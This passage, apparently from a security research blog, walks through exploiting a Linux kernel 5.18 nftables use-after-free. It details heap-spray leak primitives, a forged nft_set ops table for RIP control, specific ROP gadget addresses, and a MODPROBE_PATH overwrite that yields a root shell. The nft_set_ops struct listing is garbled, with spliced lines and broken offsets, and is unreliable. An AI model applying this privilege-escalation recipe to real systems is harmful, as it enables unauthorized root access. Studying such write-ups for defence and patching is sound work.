	    expr_info.ops->type->release_ops(expr_info.ops);

	module_put(owner);
err1:
	return ERR_PTR(err);
}

Therefore, the objects suitable for exploitation will be different from those of the publicly available exploits targetting version 5.13 and 5.15.

Exploit Strategy

The ultimate primitives we need to exploit this vulnerability are the following:

  • Memory leak primitive: Mainly to defeat KASLR.
  • RIP control primitive: To achieve kernel code execution and escalate privileges.

However, neither of these can be achieved by only using the 8-byte write primitive that the vulnerability offers. The 8-byte write primitive on a freed object can be used to corrupt the object replacing the freed allocation. This can be leveraged to force a partial free on either the 

nft_set
nft_lookup
 or the 
nft_dynset
 objects.

Partially freeing 

nft_lookup
 and 
nft_dynset
 objects can help with leaking pointers, while partially freeing an 
nft_set
 object can be pretty useful to craft a partial fake 
nft_set
 to achieve RIP control, since it has an 
ops
 member that points to a function table.

Therefore, the high-level exploitation strategy would be the following:

  1. Leak the kernel image base address.
  2. Leak a pointer to an 
    nft_set
     object.
  3. Obtain RIP control.
  4. Escalate privileges by overwriting the kernel’s 
    MODPROBE_PATH
     global variable.
  5. Return execution to userland and drop a root shell.

The following sub-sections describe how this can be achieved.

Partial Object Free Primitive

A partial object free primitive can be built by looking for a kernel object allocated with 

GFP_KERNEL_ACCOUNT
 within kmalloc-cg-64 or kmalloc-cg-96, with a pointer at offsets 24 or 32 for kmalloc-cg-64 or at offsets 64 and 72 for kmalloc-cg-96. Afterwards, when the object of interest is destroyed, 
kfree()
 has to be called on that pointer in order to partially free the targeted object.

One of such objects is the 

fdtable
 object, which is meant to hold the file descriptor table for a given process. Its definition is shown below.

// Source: https://elixir.bootlin.com/linux/v5.18.1/source/include/linux/fdtable.h#L27

struct fdtable {
        unsigned int               max_fds;              /*     0     4 */

        /* XXX 4 bytes hole, try to pack */

        struct file * *            fd;                   /*     8     8 */
        long unsigned int *        close_on_exec;        /*    16     8 */
        long unsigned int *        open_fds;             /*    24     8 */
        long unsigned int *        full_fds_bits;        /*    32     8 */
        struct callback_head       rcu __attribute__((__aligned__(8))); /*    40    16 */

        /* size: 56, cachelines: 1, members: 6 */
        /* sum members: 52, holes: 1, sum holes: 4 */
        /* forced alignments: 1 */
        /* last cacheline: 56 bytes */
} __attribute__((__aligned__(8)));

The size of an 

fdtable
 object is 56, is allocated in the kmalloc-cg-64 slab and thus can be used to replace 
nft_lookup
 objects. It has a member of interest at offset 24 (
open_fds
), which is a pointer to an unsigned long integer array. The allocation of 
fdtable
 objects is done by the kernel function 
alloc_fdtable()
, which can be reached with the following call stack.

alloc_fdtable()
 |  
 +- dup_fd()
    |
    +- copy_files()
      |
      +- copy_process()
        |
        +- kernel_clone()
          |
          +- fork() syscall

Therefore, by calling the 

fork()
 system call the current process is copied and thus the currently open files. This is done by allocating a new file descriptor table object (
fdtable
), if required, and copying the currently open file descriptors to it. The allocation of a new 
fdtable
 object only happens when the number of open file descriptors exceeds 
NR_OPEN_DEFAULT
, which is defined as 64 on 64-bit machines. The following listing shows this check.

// Source: https://elixir.bootlin.com/linux/v5.18.1/source/fs/file.c#L316

/*
 * Allocate a new files structure and copy contents from the
 * passed in files structure.
 * errorp will be valid only when the returned files_struct is NULL.
 */
struct files_struct *dup_fd(struct files_struct *oldf, unsigned int max_fds, int *errorp)
{
        struct files_struct *newf;
        struct file **old_fds, **new_fds;
        unsigned int open_files, i;
        struct fdtable *old_fdt, *new_fdt;

        *errorp = -ENOMEM;
        newf = kmem_cache_alloc(files_cachep, GFP_KERNEL);
        if (!newf)
                goto out;

        atomic_set(&newf->count, 1);

        spin_lock_init(&newf->file_lock);
        newf->resize_in_progress = false;
        init_waitqueue_head(&newf->resize_wait);
        newf->next_fd = 0;
        new_fdt = &newf->fdtab;

[1]

        new_fdt->max_fds = NR_OPEN_DEFAULT;
        new_fdt->close_on_exec = newf->close_on_exec_init;
        new_fdt->open_fds = newf->open_fds_init;
        new_fdt->full_fds_bits = newf->full_fds_bits_init;
        new_fdt->fd = &newf->fd_array[0];

        spin_lock(&oldf->file_lock);
        old_fdt = files_fdtable(oldf);
        open_files = sane_fdtable_size(old_fdt, max_fds);

        /*
         * Check whether we need to allocate a larger fd array and fd set.
         */

[2]

        while (unlikely(open_files > new_fdt->max_fds)) {
                spin_unlock(&oldf->file_lock);

                if (new_fdt != &newf->fdtab)
                        __free_fdtable(new_fdt);

[3]

                new_fdt = alloc_fdtable(open_files - 1);
                if (!new_fdt) {
                        *errorp = -ENOMEM;
                        goto out_release;
                }

[Truncated]

        }

[Truncated]

        return newf;

out_release:
        kmem_cache_free(files_cachep, newf);
out:
        return NULL;
}

At [1] the 

max_fds
 member of 
new_fdt
 is set to 
NR_OPEN_DEFAULT
. Afterwards, at [2] the loop executes only when the number of open files exceeds the 
max_fds
 value. If the loop executes, at [3] a new 
fdtable
 object is allocated via the 
alloc_fdtable()
 function.

Therefore, to force the allocation of 

fdtable
 objects in order to replace a given free object from kmalloc-cg-64 the following steps must be taken:

  1. Create more than 64 open file descriptors. This can be easily done by calling the 
    dup()
     function to duplicate an existing file descriptor, such as the 
    stdout
    . This step should be done before triggering the free of the object to be replaced with an 
    fdtable
     object, since the 
    dup()
     system call also ends up allocating 
    fdtable
     objects that can interfere.
  2. Once the target object has been freed, fork the current process a large number of times. Each 
    fork()
     execution creates one 
    fdtable
     object.

The free of the 

open_fds
 pointer is triggered when the 
fdtable
 object is destroyed in the 
__free_fdtable()
 function.

// Source: https://elixir.bootlin.com/linux/v5.18.1/source/fs/file.c#L34

static void __free_fdtable(struct fdtable *fdt)
{
        kvfree(fdt->fd);
        kvfree(fdt->open_fds);
        kfree(fdt);
}

Therefore, the partial free via the overwritten 

open_fds
 pointer can be triggered by simply terminating the child process that allocated the 
fdtable
 object.

Leaking Pointers

The exploit primitive provided by this vulnerability can be used to build a leaking primitive by overwriting the vulnerable object with an object that has an area that will be copied back to userland. One such object is the System V message represented by the 

msg_msg
structure, which is allocated in 
kmalloc-cg-*
 slab caches starting from kernel version 5.14.

The 

msg_msg
 structure acts as a header of System V messages that can be created via the userland 
msgsnd()
 function. The content of the message can be found right after the header within the same allocation. System V messages are a widely used exploit primitive for heap spraying.

// Source: https://elixir.bootlin.com/linux/v5.18.1/source/include/linux/msg.h#L9

struct msg_msg {
        struct list_head           m_list;               /*     0    16 */
        long int                   m_type;               /*    16     8 */
        size_t                     m_ts;                 /*    24     8 */
        struct msg_msgseg *        next;                 /*    32     8 */
        void *                     security;             /*    40     8 */

        /* size: 48, cachelines: 1, members: 5 */
        /* last cacheline: 48 bytes */
};

Since the size of the allocation for a System V message can be controlled, it is possible to allocate it in both kmalloc-cg-64 and kmalloc-cg-96 slab caches.

It is important to note that any data to be leaked must be written past the first 48 bytes of the message allocation, otherwise it would overwrite the 

msg_msg
 header. This restriction discards the 
nft_lookup
 object as a candidate to apply this technique to as it is only possible to write the pointer either at offset 24 or offset 32 within the object. The ability of overwriting the 
msg_msg.m_ts
 member, which defines the size of the message, helps building a strong out-of-bounds read primitive if the value is large enough. However, there is a check in the code to ensure that the 
m_ts
 member is not negative when interpreted as a signed long integer and heap addresses start with 
0xffff
, making it a negative long integer. 

Leaking an 
nft_set
 Pointer

Leaking a pointer to an 

nft_set
 object is quite simple with the memory leak primitive described above. The steps to achieve it are the following:

1. Create a target set where the expressions will be bound to.

2. Create a rule with a lookup expression bound to the target set from step 1.

3. Create a set with an embedded 

nft_dynset
 expression bound to the target set. Since this is considered an invalid expression to be embedded to a set, the 
nft_dynset
 object will be freed but not removed from the target set bindings list, causing a UAF.

4. Spray System V messages in the kmalloc-cg-96 slab cache in order to replace the freed 

nft_dynset
 object (via 
msgsnd()
 function). Tag all the messages at offset 24 so the one corrupted with the 
nft_set
 pointer can later be identified.

5. Remove the rule created, which will remove the entry of the 

nft_lookup
 expression from the target set’s bindings list. Removing this from the list effectively writes a pointer to the target 
nft_set
 object where the original 
binding.list.prev
 member was (offset 72). Since the freed 
nft_dynset
 object was replaced by a System V message, the pointer to the 
nft_set
 will be written at offset 24 within the message data.

6. Use the userland 

msgrcv()
 function to read the messages and check which one does not have the tag anymore, as it would have been replaced by the pointer to the 
nft_set
.

Leaking a Kernel Function Pointer

Leaking a kernel pointer requires a bit more work than leaking a pointer to an 

nft_set
 object. It requires being able to partially free objects within the target set bindings list as a means of crafting use-after-free conditions. This can be done by using the partial object free primitive using 
fdtable
 object already described. The steps followed to leak a pointer to a kernel function are the following.

1. Increase the number of open file descriptors by calling 

dup()
 on 
stdout
 65 times.

2. Create a target set where the expressions will be bound to (different from the one used in the `

nft_set
` adress leak).

3. Create a set with an embedded 

nft_lookup
 expression bound to the target set. Since this is considered an invalid expression to be embedded into a set, the 
nft_lookup
 object will be freed but not removed from the target set bindings list, causing a UAF.

4. Spray 

fdtable
 objects in order to replace the freed 
nft_lookup
 from step 3.

5. Create a set with an embedded 

nft_dynset
 expression bound to the target set. Since this is considered an invalid expression to be embedded into a set, the 
nft_dynset
 object will be freed but not removed from the target set bindings list, causing a UAF. This addition to the bindings list will write the pointer to its binding member into the 
open_fds
 member of the 
fdtable
 object (allocated in step 4) that replaced the 
nft_lookup
 object.

6. Spray System V messages in the kmalloc-cg-96 slab cache in order to replace the freed 

nft_dynset
 object (via 
msgsnd()
 function). Tag all the messages at offset 8 so the one corrupted can be identified.

7. Kill all the child processes created in step 4 in order to trigger the partial free of the System V message that replaced the 

nft_dynset
 object, effectively causing a UAF to a part of a System V message.

8. Spray 

time_namespace
 objects in order to replace the partially freed System V message allocated in step 7. The reason for using the 
time_namespace
 objects is explained later.

9. Since the System V message header was not corrupted, find the System V message whose tag has been overwritten. Use 

msgrcv()
 to read the data from it, which is overlapping with the newly allocated 
time_namespace
 object. The offset 40 of the data portion of the System V message corresponds to 
time_namespace.ns-&gt;ops
 member, which is a function table of functions defined within the kernel core. Armed with this information and the knowledge of the offset from the kernel base image to this function it is possible to calculate the kernel image base address.

10. Clean-up the child processes used to spray the 

time_namespace
 objects.

time_namespace
 objects are interesting because they contain an 
ns_common
 structure embedded in them, which in turn contains an 
ops
 member that points to a function table with functions defined within the kernel core. The 
time_namespace
 structure definition is listed below.

// Source: https://elixir.bootlin.com/linux/v5.18.1/source/include/linux/time_namespace.h#L19

struct time_namespace {
        struct user_namespace *    user_ns;              /*     0     8 */
        struct ucounts *           ucounts;              /*     8     8 */
        struct ns_common           ns;                   /*    16    24 */
        struct timens_offsets      offsets;              /*    40    32 */
        /* --- cacheline 1 boundary (64 bytes) was 8 bytes ago --- */
        struct page *              vvar_page;            /*    72     8 */
        bool                       frozen_offsets;       /*    80     1 */

        /* size: 88, cachelines: 2, members: 6 */
        /* padding: 7 */
        /* last cacheline: 24 bytes */
};

At offset 16, the 

ns
 member is found. It is an 
ns_common
 structure, whose definition is the following.

// Source: https://elixir.bootlin.com/linux/v5.18.1/source/include/linux/ns_common.h#L9

struct ns_common {
        atomic_long_t              stashed;              /*     0     8 */
        const struct proc_ns_operations  * ops;          /*     8     8 */
        unsigned int               inum;                 /*    16     4 */
        refcount_t                 count;                /*    20     4 */

        /* size: 24, cachelines: 1, members: 4 */
        /* last cacheline: 24 bytes */
};

At offset 8 within the 

ns_common
 structure the 
ops
 member is found. Therefore, 
time_namespace.ns-&gt;ops
 is at offset 24.

Spraying 

time_namespace
 objects can be done by calling the 
unshare()
 system call and providing the 
CLONE_NEWUSER
 and 
CLONE_NEWTIME
. In order to avoid altering the execution of the current process the 
unshare()
 executions can be done in separate processes created via 
fork()
.

clone_time_ns()
  |
  +- copy_time_ns()
    |
    +- create_new_namespaces()
      |
      +- unshare_nsproxy_namespaces()
        |
        +- unshare() syscall

The 

CLONE_NEWTIME
 flag is required because of a check in the function 
copy_time_ns()
 (listed below) and 
CLONE_NEWUSER
 is required to be able to use the 
CLONE_NEWTIME
 flag from an unprivileged user.

// Source: https://elixir.bootlin.com/linux/v5.18.1/source/kernel/time/namespace.c#L133

/**
 * copy_time_ns - Create timens_for_children from @old_ns
 * @flags:      Cloning flags
 * @user_ns:    User namespace which owns a new namespace.
 * @old_ns:     Namespace to clone
 *
 * If CLONE_NEWTIME specified in @flags, creates a new timens_for_children;
 * adds a refcounter to @old_ns otherwise.
 *
 * Return: timens_for_children namespace or ERR_PTR.
 */
struct time_namespace *copy_time_ns(unsigned long flags,
        struct user_namespace *user_ns, struct time_namespace *old_ns)
{
        if (!(flags & CLONE_NEWTIME))
                return get_time_ns(old_ns);

        return clone_time_ns(user_ns, old_ns);
}

RIP Control

Achieving RIP control is relatively easy with the partial object free primitive. This primitive can be used to partially free an 

nft_set
 object whose address is known and replace it with a fake 
nft_set
 object created with a System V message. The 
nft_set
 objects contain an 
ops
 member, which is a function table of type 
nft_set_ops
. Crafting this function table and triggering the right call will lead to RIP control.

The following is the definition of the 

nft_set_ops
 structure.

// Source: https://elixir.bootlin.com/linux/v5.18.1/source/include/net/netfilter/nf_tables.h#L389

struct nft_set_ops {
        bool                       (*lookup)(const struct net  *, const struct nft_set  *, const u32  *, const struct nft_set_ext  * *); /*     0     8 */
        bool                       (*update)(struct nft_set *, const u32  *, void * (*)(struct nft_set *, const struct nft_expr  *, struct nft_regs *), const struct nft_expr  *, struct nft_regs *, const struct nft_set_ext  * *); /*     8     8 */
        bool                       (*delete)(const struct nft_set  *, const u32  *); /*    16     8 */
        int                        (*insert)(const struct net  *, const struct nft_set  *, const struct nft_set_elem  *, struct nft_set_ext * *); /*    24     8 */
        void                       (*activate)(const struct net  *, const struct nft_set  *, const struct nft_set_elem  *); /*    32     8 */
        void *                     (*deactivate)(const struct net  *, const struct nft_set  *, cstimate *); /*    88     8 */
        int                        (*init)(const struct nft_set  *, const struct nft_set_desc  *, const struct nlattr  * const *); /*    96     8 */
        void                       (*destroy)(const struct nft_set  *); /*   onst struct nft_set_elem  *); /*    40     8 */
        bool                       (*flush)(const struct net  *, const struct nft_set  *, void *); /*    48     8 */
        void                       (*remove)(const struct net  *, const struct nft_set  *, const struct nft_set_elem  *); /*    56     8 */
        /* --- cacheline 1 boundary (64 bytes) --- */
        void                       (*walk)(const struct nft_ctx  *, struct nft_set *, struct nft_set_iter *); /*    64     8 */
        void *                     (*get)(const struct net  *, const struct nft_set  *, const struct nft_set_elem  *, unsigned int); /*    72     8 */
        u64                        (*privsize)(const struct nlattr  * const *, const struct nft_set_desc  *); /*    80     8 */
        bool                       (*estimate)(const struct nft_set_desc  *, u32, struct nft_set_e104     8 */
        void                       (*gc_init)(const struct nft_set  *); /*   112     8 */
        unsigned int               elemsize;             /*   120     4 */

        /* size: 128, cachelines: 2, members: 16 */
        /* padding: 4 */
};

The 

delete
 member is executed when an item has to be removed from the set. The item removal can be done from a rule that removes an element from a set when certain criteria is matched. Using the 
nft
 command, a very simple one can be as follows:

nft add table inet test_dynset
nft add chain inet test_dynset my_input_chain { type filter hook input priority 0\;}
nft add set inet test_dynset my_set { type ipv4_addr\; }
nft add rule inet test_dynset my_input_chain ip saddr 127.0.0.1 delete @my_set { 127.0.0.1 }

The snippet above shows the creation of a table, a chain, and a set that contains elements of type 

ipv4_addr
 (i.e. IPv4 addresses). Then a rule is added, which deletes the item 
127.0.0.1
 from the set 
my_set
 when an incoming packet has the source IPv4 address 
127.0.0.1
. Whenever a packet matching that criteria is processed via nftables, the 
delete
 function pointer of the specified set is called.

Therefore, RIP control can be achieved with the following steps. Consider the target set to be the 

nft_set
 object whose address was already obtained.

  1. Add a rule to the table being used for exploitation in which an item is removed from the target set when the source IP of incoming packets is 
    127.0.0.1
    .
  2. Partially free the 
    nft_set
     object from which the address was obtained.
  3. Spray System V messages containing a partially fake 
    nft_set
     object containing a fake 
    ops
     table, with a given value for the 
    ops-&gt;delete
     member.
  4. Trigger the call of 
    nft_set-&gt;ops-&gt;delete
     by locally sending a network packet to 
    127.0.0.1
    . This can be done by simply opening a TCP socket to 
    127.0.0.1
     at any port and issuing a 
    connect()
     call.

Escalating Privileges

Once the control of the RIP register is achieved and thus the code execution can be redirected, the last step is to escalate privileges of the current process and drop to an interactive shell with root privileges.

A way of achieving this is as follows:

  1. Pivot the stack to a memory area under control. When the 
    delete
     function is called, the RSI register contains the address of the memory region where the nftables register values are stored. The values of such registers can be controlled by adding an 
    immediate
     expression in the rule created to achieve RIP control.
  2. Afterwards, since the nftables register memory area is not big enough to fit a ROP chain to overwrite the 
    MODPROBE_PATH
     global variable, the stack is pivoted again to the end of the fake 
    nft_set
     used for RIP control.
  3. Build a ROP chain to overwrite the 
    MODPROBE_PATH
     global variable. Place it at the end of the 
    nft_set
     mentioned in step 2.
  4. Return to userland by using the KPTI trampoline.
  5. Drop to a privileged shell by leveraging the overwritten 
    MODPROBE_PATH
     global variable
    .

The stack pivot gadgets and ROP chain used can be found below.

// ROP gadget to pivot the stack to the nftables registers memory area

0xffffffff8169361f: push rsi ; add byte [rbp+0x310775C0], al ; rcr byte [rbx+0x5D], 0x41 ; pop rsp ; ret ;


// ROP gadget to pivot the stack to the memory allocation holding the target nft_set

0xffffffff810b08f1: pop rsp ; ret ;

When the execution flow is redirected, the RSI register contains the address otf the nftables’ registers memory area. This memory can be controlled and thus is used as a temporary stack, given that the area is not big enough to hold the entire ROP chain. Afterwards, using the second gadget shown above, the stack is pivoted towards the end of the fake 

nft_set
 object.

// ROP chain used to overwrite the MODPROBE_PATH global variable

0xffffffff8148606b: pop rax ; ret ;
0xffffffff8120f2fc: pop rdx ; ret ;
0xffffffff8132ab39: mov qword [rax], rdx ; ret ;

It is important to mention that the stack pivoting gadget that was used performs memory dereferences, requiring the address to be mapped. While experimentally the address was usually mapped, it negatively impacts the exploit reliability.

Wrapping Up

We hope you enjoyed this reading and could learn something new. If you are hungry for more make sure to check our other blog posts.

We wish y’all a great Christmas holidays and a happy new year! Here’s to a 2023 with more bugs, exploits, and write ups!